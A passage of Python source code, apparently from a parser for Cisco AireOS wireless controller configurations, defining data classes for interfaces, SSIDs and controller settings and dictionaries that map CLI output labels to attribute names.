self.virtual_dns_host_name = None\n self.remote_id_format = None\n self.link_select_suboption = None\n self.relay_src_intf = None\n self.vpn_select_suboption = None\n\n def __str__(self):\n return 'Dynamic interface ' + self.name\n\n def __repr__(self):\n return 'Dynamic interface ' + self.name\n\n def update_name(self):\n self.name = self.interface_name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Interface_Group(): # Item for NamedList \"interface groups\" - subclass of wlc_config\n def __init__(self, name=None):\n self.objname = 'Interface Group'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.name = None\n self.interface_group_name = None\n self.quarantine = None\n self.number_of_wlans_using_the_interface_group = None\n self.number_of_ap_groups_using_the_interface_group = None\n self.number_of_interfaces_contained = None\n self.mdns_profile_name = None\n self.failure_detect_mode = None\n self.interface_group_description = None\n self.interfaces = None\n\n def __str__(self):\n return 'Interface group ' + self.interface_group_name\n\n def __repr__(self):\n return 'Interface group ' + self.interface_group_name\n\n def update_name(self):\n self.name = self.interface_group_name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Ssid_Config(): # Item for NamedList \"WLANs\" - subclass of wlc_config\n def __init__(self):\n self.objname = 'SSID config'\n self.name = None\n self.type = 'config' # defines if class contain operational or config data\n self.wlan_identifier = None\n self.profile_name = None\n self.network_name_ssid = None\n self.status = None\n self.mac_filtering = None\n self.broadcast_ssid = None\n self.aaa_policy_override = None\n self.network_admission_control = None\n self.client_profiling_status = None\n self.client_profiling_status_radius_profiling = None\n self.client_profiling_status_radius_profiling_dhcp = None\n self.client_profiling_status_radius_profiling_http = None\n self.client_profiling_status_local_profiling = None\n self.client_profiling_status_local_profiling_dhcp = None\n self.client_profiling_status_local_profiling_http = None\n self.radius_nac_state = None\n self.snmp_nac_state = None\n self.quarantine_vlan = None\n self.maximum_clients_allowed = None\n self.security_group_tag = None\n self.maximum_number_of_clients_per_ap_radio = None\n self.atf_policy = None\n self.number_of_active_clients = None\n self.exclusionlist = None\n self.exclusionlist_timeout = None\n self.session_timeout = None\n self.user_idle_timeout = None\n self.sleep_client = None\n self.sleep_client_timeout = None\n self.web_auth_captive_bypass_mode = None\n self.user_idle_threshold = None\n self.nas_identifier = None\n self.chd_per_wlan = None\n self.webauth_dhcp_exclusion = None\n self.interface = None\n self.multicast_interface = None\n self.wlan_ipv4_acl = None\n self.wlan_ipv6_acl = None\n self.wlan_layer2_acl = None\n self.wlan_url_acl = None\n self.mdns_status = None\n self.mdns_profile_name = None\n self.dhcp_server = None\n self.central_nat_peer_peer_blocking = None\n self.dhcp_address_assignment_required = None\n self.static_ip_client_tunneling = None\n self.tunnel_profile = None\n self.pmipv6_mobility_type = None\n self.pmipv6_mobility_type_pmipv6_mag_profile = None\n self.pmipv6_mobility_type_pmipv6_default_realm = None\n self.pmipv6_mobility_type_pmipv6_nai_type = None\n self.pmipv6_mobility_type_pmipv6_mag_location = None\n self.quality_of_service = None\n self.per_ssid_rate_limits = None\n self.average_data_rate = None\n self.average_realtime_data_rate = None\n self.burst_data_rate = None\n self.burst_realtime_data_rate = None\n self.per_client_rate_limits = None\n self.average_data_rate = None\n self.average_realtime_data_rate = None\n self.burst_data_rate = None\n self.burst_realtime_data_rate = None\n self.scan_defer_priority = None\n self.scan_defer_time = None\n self.wmm = None\n self.wmm_uapsd_compliant_client_support = None\n self.media_stream_multicast_direct = None\n self.ccx_aironetie_support = None\n self.ccx_gratuitous_proberesponse_gpr = None\n self.ccx_diagnostics_channel_capability = None\n self.dot11_phone_mode_7920 = None\n self.wired_protocol = None\n self.passive_client_feature = None\n self.peer_to_peer_blocking_action = None\n self.radio_policy = None\n self.dtim_period_for_802_11a_radio = None\n self.dtim_period_for_802_11b_radio = None\n self.radius_servers = None\n self.radius_servers_authentication = None\n self.radius_servers_accounting = None\n self.radius_servers_accounting_interim_update = None\n self.radius_servers_accounting_interim_update_interval = None\n self.radius_servers_accounting_framed_ipv6_acct_avp = None\n self.radius_servers_dynamic_interface = None\n self.radius_servers_dynamic_interface_priority = None\n self.local_eap_authentication = None\n self.radius_nai_realm = None\n self.mu_mimo = None\n self.security = None\n self.security_802_11_authentication = None\n self.security_ft_support = None\n self.security_static_wep_keys = None\n self.security_802_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2 = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa_ssn_ie = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_tkip_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_aes_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_ccmp256_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp128_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_wpa2_rsn_ie_gcmp256_cipher = None\n self.security_wi_fi_protected_access_wpa_wpa2_osen_ie = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_802_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_psk = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_cckm = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_1x802_11r = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_ft_psk802_11r = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_1x802_11w = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_pmf_psk802_11w = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_osen_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_auth_key_management_suiteb192_1x = None\n self.security_wi_fi_protected_access_wpa_wpa2_ft_reassociation_timeout = None\n self.security_wi_fi_protected_access_wpa_wpa2_ft_over_the_ds_mode = None\n self.security_wi_fi_protected_access_wpa_wpa2_gtk_randomization = None\n self.security_wi_fi_protected_access_wpa_wpa2_skc_cache_support = None\n self.security_wi_fi_protected_access_wpa_wpa2_cckm_tsf_tolerance = None\n self.security_wi_fi_direct_policy_configured = None\n self.security_eap_passthrough = None\n self.security_ckip = None\n self.security_web_based_authentication = None\n self.security_web_authentication_timeout = None\n self.security_web_passthrough = None\n self.security_mac_auth_server = None\n self.security_web_portal_server = None\n self.security_qrscan_des_key = None\n self.security_conditional_web_redirect = None\n self.security_splash_page_web_redirect = None\n self.security_auto_anchor = None\n self.security_flexconnect_local_switching = None\n self.security_flexconnect_central_association = None\n self.security_flexconnect_central_dhcp_flag = None\n self.security_flexconnect_nat_pat_flag = None\n self.security_flexconnect_dns_override_flag = None\n self.security_flexconnect_pppoe_pass_through = None\n self.security_flexconnect_local_switching_ip_source_guar = None\n self.security_flexconnect_vlan_based_central_switching = None\n self.security_flexconnect_local_authentication = None\n self.security_flexconnect_learn_ip_address = None\n self.security_client_mfp = None\n self.security_pmf = None\n self.security_pmf_association_comeback_time = None\n self.security_pmf_sa_query_retrytimeout = None\n self.security_tkip_mic_countermeasure_hold_down_timer = None\n self.security_eap_params = None\n self.avc_visibility = None\n self.avc_profile_name = None\n self.flex_avc_profile_name = None\n self.opendns_profile_name = None\n self.opendns_wlan_mode = None\n self.flow_monitor_name = None\n self.split_tunnel_configuration = None\n self.split_tunnel_configuration_split_tunnel = None\n self.call_snooping = None\n self.roamed_call_re_anchor_policy = None\n self.sip_cac_fail_send_486_busy_policy = None\n self.sip_cac_fail_send_dis_association_policy = None\n self.kts_based_cac_policy = None\n self.assisted_roaming_prediction_optimization = None\n self.d_802_11k_neighbor_list = None\n self.d_802_11k_neighbor_list_dual_band = None\n self.d_802_11v_directed_multicast_service = None\n self.d_802_11v_bss_max_idle_service = None\n self.d_802_11v_bss_transition_service = None\n self.d_802_11v_bss_transition_disassoc_imminent = None\n self.d_802_11v_bss_transition_disassoc_timer = None\n self.d_802_11v_bss_transition_oproam_disassoc_timer = None\n self.dms_db_is_empty = None\n self.band_select = None\n self.load_balancing = None\n self.multicast_buffer = None\n self.universal_ap_admin = None\n self.broadcast_tagging = None\n self.prp = None\n self.mobility_anchor_list = None\n self.d_802_11u = None\n self.msap_services = None\n self.local_policy = None\n self.priority__policy_name = None\n self.lync_state = None\n self.audio_qos_policy = None\n self.video_qos_policy = None\n self.app_share_qos_policy = None\n self.file_transfer_qos_policy = None\n self.qos_fastlane_status = None\n self.selective_reanchoring_status = None\n self.lobby_admin_access = None\n self.fabric_status = None\n self.vnid_name = None\n self.vnid = None\n self.applied_sgt_tag = None\n self.peer_ip_address = None\n self.flex_acl_name = None\n self.flex_avc_policy_name = None\n self.u3_interface = None\n self.u3_reporting_interval = None\n\n def update_name(self):\n self.name = self.network_name_ssid\n\n def __str__(self):\n return 'SSID config ' + self.name\n\n def __repr__(self):\n return 'SSID config ' + self.name\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n\nclass Wlc_Config():\n def __init__(self, hostname=None, parsing_date=None, software_version=None, collection_time='None'):\n self.__wlc_config_version__ = '0.2.0'\n self.__parser_version__ = '0.81'\n self.software_version = software_version\n self.objname = 'WLC AireOS config'\n self.platform = None #9800\\AireOS\n self.type = 'mixed' # defines if class contain operational or config data\n self.name = None # hostname?\n self.parsing_date = parsing_date\n self.collection_time = collection_time\n self.hostname = hostname\n self.dhcp_proxy = None\n self.dynamic_interfaces = NamedList('Dynamic Interfaces',\n 'Dynamic_Interface') # item type should be Dynamic Interface\n self.interface_group = NamedList('Interface Groups', 'Interface_Group')\n self.ssid = NamedList('SSIDs', 'Ssid_Config') # item type should be Ssid_Config\n self.ap_rf = NamedList('AP RF Configs', 'Ap_Rf_Config') # item type should be Ap_Rf_Config\n self.rogue_aps = NamedList('Rogue APs', 'Rogue_AP')\n self.ports = NamedList('Ports', 'Port')\n self.mobility_group_members = NamedList('Mobility group members', 'Mobility group member')\n self.radius_authentication_servers = NamedList('Radius authentication servers', 'Radius authentication server')\n self.radius_accounting_servers = NamedList('Radius accounting servers', 'Radius accounting server')\n self.ap_configs = NamedList('AP Configs', 'Ap_Config')\n self.dhcp_servers = NamedList('DHCP servers', 'Dhcp_Server')\n self.rf_profiles = NamedList('RF profiles', 'Rf_Profile')\n self.ap_groups = NamedList('AP Groups', 'Ap_Group')\n self.radius_config = Radius_Config()\n self.switch = Switch_Config()\n self.network = Network_Config()\n self.advanced = Advanced_Config()\n self.redundancy = Redundancy_Config()\n self.mobility_config = Mobility_Config()\n self.system = System_Config()\n self.band5 = Band5_Config()\n self.band24 = Band24_Config()\n self.cleanair_24 = Cleanair_24G_Config()\n self.cleanair_5 = Cleanair_5G_Config()\n self.ipv6 = Ipv6_Config()\n\n def add_subclass(self, object):\n if isinstance(object, NamedList): # For Named LIST objects\n if object.item_name == 'Ssid_Config': self.ssid = object\n if object.item_name == 'Dynamic_Interface': self.dynamic_interfaces = object\n if object.item_name == 'Interface_Group': self.interface_group = object\n if object.item_name == 'Ap_Rf_Config': self.ap_rf = object\n if object.item_name == 'Rogue_AP': self.rogue_aps = object\n if object.item_name == 'Port': self.ports = object\n if object.item_name == 'Radius authentication server': self.radius_authentication_servers = object\n if object.item_name == 'Radius accounting server': self.radius_accounting_servers = object\n if object.item_name == 'Mobility group member': self.mobility_group_members = object\n if object.item_name == 'Rf_Profile': self.rf_profiles = object\n if object.item_name == 'Ap_Config': self.ap_configs = object # Check item name here self.ap_configs = NamedList('AP Configs', 'Ap_Config')\n if object.item_name == 'Dhcp_Server': self.dhcp_servers = object\n if object.item_name == 'Ap_Group': self.ap_groups = object\n if object.item_name == 'Nearby_Ap':\n self.ap_rf[object.name].nearby_aps = object\n else: ##For NON - Named List objects\n if isinstance(object, Switch_Config): self.switch = object\n if isinstance(object, Ipv6_Config): self.ipv6 = object\n if isinstance(object, Radius_Config): self.radius_config = object\n if isinstance(object, Network_Config): self.network = object\n if isinstance(object, Redundancy_Config): self.redundancy = object\n if isinstance(object, System_Config): self.system = object\n if isinstance(object, Advanced_Config): self.advanced = object\n if isinstance(object, Band5_Config): self.band5 = object\n if isinstance(object, Band24_Config): self.band24 = object\n if isinstance(object, Cleanair_24G_Config): self.cleanair_24 = object\n if isinstance(object, Cleanair_5G_Config): self.cleanair_5 = object\n if isinstance(object, Mobility_Config): self.mobility_config = object\n\n def __str__(self):\n return 'WLC config for host: ' + self.hostname + ', platform: ' + self.platform + ', version is ' + self.software_version + ', collection time is ' + self.collection_time + ', parsing date is ' + self.parsing_date\n\n def __repr__(self):\n return 'WLC config for host: ' + self.hostname + ', platform: ' + self.platform + ', version is ' + self.software_version + ', collection time is ' + self.collection_time + ', parsing date is ' + self.parsing_date\n\n def show(self):\n show(self)\n\n def grep(self, keyword):\n grep(self, keyword)\n\n# AireOS PARSING DICTIONARIES SECTION\n\nadvanced_config_parsing_dict = {\n 'Probe request filtering': 'probe_request_filtering',\n 'Probes fwd to controller per client per radio': 'probes_fwd_to_controller_per_client_per_radio',\n 'Probe request rate-limiting interval': 'probe_request_rate_limiting_interval',\n 'Aggregate Probe request interval': 'aggregate_probe_request_interval',\n 'Increased backoff parameters for probe respon': 'increased_backoff_parameters_for_probe',\n 'EAP-Identity-Request Timeout (seconds)': 'eap_identity_request_timeout_seconds',\n 'EAP-Identity-Request Max Retries': 'eap_identity_request_max_retries',\n 'EAP Key-Index for Dynamic WEP': 'eap_key_index_for_dynamic_wep',\n 'EAP Max-Login Ignore Identity Response': 'eap_max_login_ignore_identity_response',\n 'EAP-Request Timeout (seconds)': 'eap_request_timeout_seconds',\n 'EAP-Request Max Retries': 'eap_request_max_retries',\n 'EAPOL-Key Timeout (milliseconds)': 'eapol_key_timeout_milliseconds',\n 'EAPOL-Key Max Retries': 'eapol_key_max_retries',\n 'EAP-Broadcast Key Interval': 'eap_broadcast_key_interval',\n 'Fastpath Packet Capture': 'fastpath_packet_capture',\n 'Fastpath Fast Cache Control': 'fastpath_fast_cache_control',\n 'Fastpath Fast Testmode': 'fastpath_fast_testmode',\n 'dot11-padding': 'dot11_padding',\n 'padding-size': 'padding_size',\n 'Advanced Hotspot Commands': 'advanced_hotspot_commands',\n 'ANQP 4-way state': 'anqp_4_way_state',\n 'GARP Broadcast state:': 'garp_broadcast_state',\n 'GAS request rate limit': 'gas_request_rate_limit',\n 'ANQP comeback delay in TUs(TU=1024usec)': 'anqp_comeback_delay',\n}\n\nipv6_config_parsing_dict = {\n 'Global Config': 'global_config',\n 'Reachable-lifetime value': 'reachable_lifetime_value',\n 'Stale-lifetime value': 'stale_lifetime_value',\n 'Down-lifetime value': 'down_lifetime_value',\n 'RA Throttling': 'ra_throttling',\n 'RA Throttling allow at-least': 'ra_throttling_allow_at_least',\n 'RA Throttling allow at-most': 'ra_throttling_allow_at_most',\n 'RA Throttling max-through': 'ra_throttling_max_through',\n 'RA Throttling throttle-period': 'ra_throttling_throttle_period',\n 'RA Throttling interval-option': 'ra_throttling_interval_option',\n 'NS Mulitcast CacheMiss Forwarding': 'ns_mulitcast_cachemiss_forwarding',\n 'NA Mulitcast Forwarding': 'na_mulitcast_forwarding',\n 'IPv6 Capwap UDP Lite': 'ipv6_capwap_udp_lite',\n 'Operating System IPv6 state': 'operating_system_ipv6_state',\n}\n\nradius_config_parsing_dict = {\n 'Vendor Id Backward Compatibility': 'vendor_id_backward_compatibility',\n 'Call Station Id Case': 'call_station_id_case',\n 'Accounting Call Station Id Type': 'accounting_call_station_id_type',\n 'Auth Call Station Id Type': 'auth_call_station_id_type',\n 'Extended Source Ports Support': 'extended_source_ports_support',\n 'Aggressive Failover': 'aggressive_failover',\n 'Keywrap': 'keywrap',\n 'Fallback Test:': 'fallback_test',\n 'Test Mode': 'fallback_test_test_mode',\n 'Probe User Name': 'fallback_test_probe_user_name',\n 'Interval (in seconds)': 'fallback_test_interval_in_seconds',\n 'MAC Delimiter for Authentication Messages': 'mac_delimiter_for_authentication_messages',\n 'MAC Delimiter for Accounting Messages': 'mac_delimiter_for_accounting_messages',\n 'RADIUS Authentication Framed-MTU': 'radius_authentication_framed_mtu',\n}\n\nap_group_parsing_dict = {\n 'Site Name': 'site_name',\n 'Site Description': 'site_description',\n 'Venue Group Code': 'venue_group_code',\n 'Venue Type Code': 'venue_type_code',\n 'NAS-identifier': 'nas_identifier',\n 'Client Traffic QinQ Enable': 'client_traffic_qinq_enable',\n 'DHCPv4 QinQ Enable': 'dhcpv4_qinq_enable',\n 'AP Operating Class': 'ap_operating_class',\n 'Capwap Prefer Mode': 'capwap_prefer_mode',\n 'Antenna Monitoring - Status': 'antenna_monitoring_status',\n '2.4 GHz band': 'rf_profile_24',\n '5 GHz band': 'rf_profile_5',\n 'Fabric Flex Acl Template Name': 'fabric_flex_acl_template_name',\n}\nband_24_parsing_dict = {\n '802.11b Network': 'd_802_11b_network',\n '11gSupport': 'd_11gsupport',\n '11nSupport': 'd_11nsupport',\n '802.11b/g Operational Rates': 'd_802_11b_g_operational_rates',\n '802.11b 1M Rate': 'd_802_11b_g_operational_rates_802_11b_g_1m_rate',\n '802.11b 2M Rate': 'd_802_11b_g_operational_rates_802_11b_g_2m_rate',\n '802.11b 5.5M Rate': 'd_802_11b_g_operational_rates_802_11b_g_5_5m_rate',\n '802.11b 11M Rate': 'd_802_11b_g_operational_rates_802_11b_g_11m_rate',\n '802.11b/g 1M Rate': 'd_802_11b_g_operational_rates_802_11b_g_1m_rate',\n '802.11b/g 2M Rate': 'd_802_11b_g_operational_rates_802_11b_g_2m_rate',\n '802.11b/g 5.5M Rate': 'd_802_11b_g_operational_rates_802_11b_g_5_5m_rate',\n '802.11b/g 11M Rate': 'd_802_11b_g_operational_rates_802_11b_g_11m_rate',\n '802.11g 6M Rate': 'd_802_11b_g_operational_rates_802_11g_6m_rate',\n '802.11g 9M Rate': 'd_802_11b_g_operational_rates_802_11g_9m_rate',\n '802.11g 12M Rate': 'd_802_11b_g_operational_rates_802_11g_12m_rate',\n '802.11g 18M Rate': 'd_802_11b_g_operational_rates_802_11g_18m_rate',\n '802.11g 24M Rate': 'd_802_11b_g_operational_rates_802_11g_24m_rate',\n '802.11g 36M Rate': 'd_802_11b_g_operational_rates_802_11g_36m_rate',\n '802.11g 48M Rate': 'd_802_11b_g_operational_rates_802_11g_48m_rate',\n '802.11g 54M Rate': 'd_802_11b_g_operational_rates_802_11g_54m_rate',\n '802.11n MCS Settings:': 'd_802_11n_mcs_settings',\n 'MCS 0': 'd_802_11n_mcs_settings_mcs_0',\n 'MCS 1': 'd_802_11n_mcs_settings_mcs_1',\n 'MCS 2': 'd_802_11n_mcs_settings_mcs_2',\n 'MCS 3': 'd_802_11n_mcs_settings_mcs_3',\n 'MCS 4': 'd_802_11n_mcs_settings_mcs_4',\n 'MCS 5': 'd_802_11n_mcs_settings_mcs_5',\n 'MCS 6': 'd_802_11n_mcs_settings_mcs_6',\n 'MCS 7': 'd_802_11n_mcs_settings_mcs_7',\n 'MCS 8': 'd_802_11n_mcs_settings_mcs_8',\n 'MCS 9': 'd_802_11n_mcs_settings_mcs_9',\n 'MCS 10': 'd_802_11n_mcs_settings_mcs_10',\n 'MCS 11': 'd_802_11n_mcs_settings_mcs_11',\n 'MCS 12': 'd_802_11n_mcs_settings_mcs_12',\n 'MCS 13': 'd_802_11n_mcs_settings_mcs_13',\n 'MCS 14': 'd_802_11n_mcs_settings_mcs_14',\n 'MCS 15': 'd_802_11n_mcs_settings_mcs_15',\n 'MCS 16': 'd_802_11n_mcs_settings_mcs_16',\n 'MCS 17': 'd_802_11n_mcs_settings_mcs_17',\n 'MCS 18': 'd_802_11n_mcs_settings_mcs_18',\n 'MCS 19': 'd_802_11n_mcs_settings_mcs_19',\n 'MCS 20': 'd_802_11n_mcs_settings_mcs_20',\n 'MCS 21': 'd_802_11n_mcs_settings_mcs_21',\n 'MCS 22': 'd_802_11n_mcs_settings_mcs_22',\n 'MCS 23': 'd_802_11n_mcs_settings_mcs_23',\n 'MCS 24': 'd_802_11n_mcs_settings_mcs_24',\n 'MCS 25': 'd_802_11n_mcs_settings_mcs_25',\n 'MCS 26': 'd_802_11n_mcs_settings_mcs_26',\n 'MCS 27': 'd_802_11n_mcs_settings_mcs_27',\n 'MCS 28': 'd_802_11n_mcs_settings_mcs_28',\n 'MCS 29': 'd_802_11n_mcs_settings_mcs_29',\n 'MCS 30': 'd_802_11n_mcs_settings_mcs_30',\n 'MCS 31': 'd_802_11n_mcs_settings_mcs_31',\n '802.11n Status:': 'd_802_11n_status',\n 'A-MPDU Tx:': 'd_802_11n_status_a_mpdu_tx',\n 'Priority 0': 'd_802_11n_status_a_mpdu_tx_priority_0',\n 'Priority 1': 'd_802_11n_status_a_mpdu_tx_priority_1',\n 'Priority 2': 'd_802_11n_status_a_mpdu_tx_priority_2',\n 'Priority 3': 'd_802_11n_status_a_mpdu_tx_priority_3',\n 'Priority 4': 'd_802_11n_status_a_mpdu_tx_priority_4',\n 'Priority 5': 'd_802_11n_status_a_mpdu_tx_priority_5',\n 'Priority 6': 'd_802_11n_status_a_mpdu_tx_priority_6',\n 'Priority 7': 'd_802_11n_status_a_mpdu_tx_priority_7',\n 'Aggregation scheduler': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler',\n 'Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler_realtime_timeout',\n 'Non Realtime Timeout': 'd_802_11n_status_a_mpdu_tx_aggregation_scheduler_non_realtime_timeout',\n 'A-MSDU Tx:': 'd_802_11n_status_a_msdu_tx',\n 'Priority 01': 'd_802_11n_status_a_msdu_tx_priority_0',\n 'Priority 11': 'd_802_11n_status_a_msdu_tx_priority_1',\n 'Priority 21': 'd_802_11n_status_a_msdu_tx_priority_2',\n 'Priority 31': 'd_802_11n_status_a_msdu_tx_priority_3',\n 'Priority 41': 'd_802_11n_status_a_msdu_tx_priority_4',\n 'Priority 51': 'd_802_11n_status_a_msdu_tx_priority_5',\n 'Priority 61': 'd_802_11n_status_a_msdu_tx_priority_6',\n 'Priority 71': 'd_802_11n_status_a_msdu_tx_priority_7',\n 'A-MSDU Max Subframes': 'd_802_11n_status_a_msdu_max_subframes',\n 'A-MSDU MAX Length': 'd_802_11n_status_a_msdu_max_length',\n 'Rifs Rx': 'd_802_11n_status_rifs_rx',\n 'Guard Interval': 'd_802_11n_status_guard_interval',\n 'Beacon Interval': 'beacon_interval',\n 'CF Pollable mode': 'cf_pollable_mode',\n 'CF Poll Request mandatory': 'cf_poll_request_mandatory',\n 'CFP Period': 'cfp_period',\n 'CFP Maximum Duration': 'cfp_maximum_duration',\n 'Default Channel': 'default_channel',\n 'Default Tx Power Level': 'default_tx_power_level',\n 'DTPC Status': 'dtpc_status',\n 'RSSI Low Check': 'rssi_low_check',\n 'RSSI Threshold': 'rssi_threshold',\n 'Call Admission Limit': 'call_admission_limit',\n 'G711 CU Quantum': 'g711_cu_quantum',\n 'ED Threshold': 'ed_threshold',\n 'Fragmentation Threshold': 'fragmentation_threshold',\n 'PBCC mandatory': 'pbcc_mandatory',\n 'RTS Threshold': 'rts_threshold',\n 'Short Preamble mandatory': 'short_preamble_mandatory',\n 'Short Retry Limit': 'short_retry_limit',\n 'Legacy Tx Beamforming setting': 'legacy_tx_beamforming_setting',\n 'Traffic Stream Metrics Status': 'traffic_stream_metrics_status',\n 'Expedited BW Request Status': 'expedited_bw_request_status',\n 'World Mode': 'world_mode',\n 'Faster Carrier Tracking Loop': 'faster_carrier_tracking_loop',\n 'EDCA profile type': 'edca_profile_type',\n 'Voice MAC optimization status': 'voice_mac_optimization_status',\n 'Call Admission Control (CAC) configuration': 'call_admission_control_cac_configuration',\n 'Voice AC - Admission control (ACM)': 'call_admission_control_cac_configuration_voice_ac_admission_control_acm',\n 'Voice Stream-Size': 'call_admission_control_cac_configuration_voice_stream_size',\n 'Voice Max-Streams': 'call_admission_control_cac_configuration_voice_max_streams',\n 'Voice max RF bandwidth': 'call_admission_control_cac_configuration_voice_max_rf_bandwidth',\n 'Voice reserved roaming bandwidth': 'call_admission_control_cac_configuration_voice_reserved_roaming_bandwidth',\n 'Voice CAC Method': 'call_admission_control_cac_configuration_voice_cac_method',\n 'Voice tspec inactivity timeout': 'call_admission_control_cac_configuration_voice_tspec_inactivity_timeout',\n 'CAC SIP-Voice configuration': 'cac_sip_voice_configuration',\n 'SIP based CAC': 'cac_sip_voice_configuration_sip_based_cac',\n 'SIP Codec Type': 'cac_sip_voice_configuration_sip_codec_type',\n 'SIP call bandwidth:': 'cac_sip_voice_configuration_sip_call_bandwidth',\n 'SIP call bandwidth sample-size': 'cac_sip_voice_configuration_sip_call_bandwidth_sample_size',\n 'Video AC - Admission control (ACM)': 'cac_sip_voice_configuration_video_ac_admission_control_acm',\n 'Video max RF bandwidth': 'cac_sip_voice_configuration_video_max_rf_bandwidth',\n 'Video reserved roaming bandwidth': 'cac_sip_voice_configuration_video_reserved_roaming_bandwidth',\n 'Video load-based CAC mode': 'cac_sip_voice_configuration_video_load_based_cac_mode',\n 'Video CAC Method': 'cac_sip_voice_configuration_video_cac_method',\n 'CAC SIP-Video configuration': 'cac_sip_video_configuration',\n 'SIP based CAC1': 'cac_sip_video_configuration_sip_based_cac',\n 'Best-effort AC - Admission control (ACM)': 'cac_sip_video_configuration_best_effort_ac_admission_control_acm',\n 'Background AC - Admission control (ACM)': 'cac_sip_video_configuration_background_ac_admission_control_acm',\n 'Maximum Number of Clients per AP': 'maximum_number_of_clients_per_ap',\n 'L2Roam 802.11bg RF Parameters': 'l2roam_802_11bg_rf_parameters',\n 'Config Mode': 'l2roam_802_11bg_rf_parameters_config_mode',\n 'Minimum RSSI': 'l2roam_802_11bg_rf_parameters_minimum_rssi',\n 'Roam Hysteresis': 'l2roam_802_11bg_rf_parameters_roam_hysteresis',\n 'Scan Threshold': 'l2roam_802_11bg_rf_parameters_scan_threshold',\n 'Transition time': 'l2roam_802_11bg_rf_parameters_transition_time',\n}\n\nband_5_parsing_dict = {\n '802.11a Network': 'd_802_11a_network',\n '11acSupport': 'd_11acsupport',\n '11nSupport': 'd_11nsupport',\n '802.11a Low Band': 'd_11nsupport_802_11a_low_band',\n '802.11a Mid Band': 'd_11nsupport_802_11a_mid_band',\n '802.11a High Band': 'd_11nsupport_802_11a_high_band',\n '802.11a Operational Rates': 'd_802_11a_operational_rates',\n '802.11a 6M Rate': 'd_802_11a_operational_rates_802_11a_6m_rate',\n '802.11a 9M Rate': 'd_802_11a_operational_rates_802_11a_9m_rate',\n '802.11a 12M Rate': 'd_802_11a_operational_rates_802_11a_12m_rate',\n '802.11a 18M Rate': 'd_802_11a_operational_rates_802_11a_18m_rate',\n '802.11a 24M Rate': 'd_802_11a_operational_rates_802_11a_24m_rate',\n '802.11a 36M Rate': 'd_802_11a_operational_rates_802_11a_36m_rate',\n '802.11a 48M Rate': 'd_802_11a_operational_rates_802_11a_48m_rate',\n '802.11a 54M Rate': 'd_802_11a_operational_rates_802_11a_54m_rate',\n '802.11n MCS Settings:': 'd_802_11n_mcs_settings',\n 'MCS 0': 'd_802_11n_mcs_settings_mcs_0',\n 'MCS 1': 'd_802_11n_mcs_settings_mcs_1',\n 'MCS 2': 'd_802_11n_mcs_settings_mcs_2',\n 'MCS 3': 'd_802_11n_mcs_settings_mcs_3',\n 'MCS 4': 'd_802_11n_mcs_settings_mcs_4',\n 'MCS 5': 'd_802_11n_mcs_settings_mcs_5',\n 'MCS 6': 'd_802_11n_mcs_settings_mcs_6',\n 'MCS 7': 'd_802_11n_mcs_settings_mcs_7',\n 'MCS 8': 'd_802_11n_mcs_settings_mcs_8',\n 'MCS 9': 'd_802_11n_mcs_settings_mcs_9',\n 'MCS 10': 'd_802_11n_mcs_settings_mcs_10',\n 'MCS 11': 'd_802_11n_mcs_settings_mcs_11',\n 'MCS 12': 'd_802_11n_mcs_settings_mcs_12',\n 'MCS 13': 'd_802_11n_mcs_settings_mcs_13',\n 'MCS 14': 'd_802_11n_mcs_settings_mcs_14',\n 'MCS 15': 'd_802_11n_mcs_settings_mcs_15',\n 'MCS 16': 'd_802_11n_mcs_settings_mcs_16',\n 'MCS 17': 'd_802_11n_mcs_settings_mcs_17',\n 'MCS 18': 'd_802_11n_mcs_settings_mcs_18',\n 'MCS 19': 'd_802_11n_mcs_settings_mcs_19',\n 'MCS 20': 'd_802_11n_mcs_settings_mcs_20',\n 'MCS 21': 'd_802_11n_mcs_settings_mcs_21',\n 'MCS 22': 'd_802_11n_mcs_settings_mcs_22',\n 'MCS 23': 'd_802_11n_mcs_settings_mcs_23',\n 'MCS 24': 'd_802_11n_mcs_settings_mcs_24',\n 'MCS 25': 'd_802_11n_mcs_settings_mcs_25',\n 'MCS 26': 'd_802_11n_mcs_settings_mcs_26',\n 'MCS 27': 'd_802_11n_mcs_settings_mcs_27',\n 'MCS 28': 'd_802_11n_mcs_settings_mcs_28',\n 'MCS 29': 'd_802_11n_mcs_settings_mcs_29',\n 'MCS 30': 'd_802_11n_mcs_settings_mcs_30',\n 'MCS 31': 'd_802_11n_mcs_settings_mcs_31',\n '802.11ac MCS Settings:': 'd_802_11ac_mcs_settings',\n 'Nss=1: MCS 0-9': 'd_802_11ac_mcs_settings_nss_1_mcs_0_9',\n 'Nss=2: MCS 0-9': 'd_802_11ac_mcs_settings_nss_2_mcs_0_9',\n 'Nss=3: MCS 0-9': 'd_802_11ac_mcs_settings_nss_3_mcs_0_9',\n 'Nss=4: MCS 0-7': 'd_802_11ac_mcs_settings_nss_4_mcs_0_7',\n 'Nss=4: MCS 0-9': 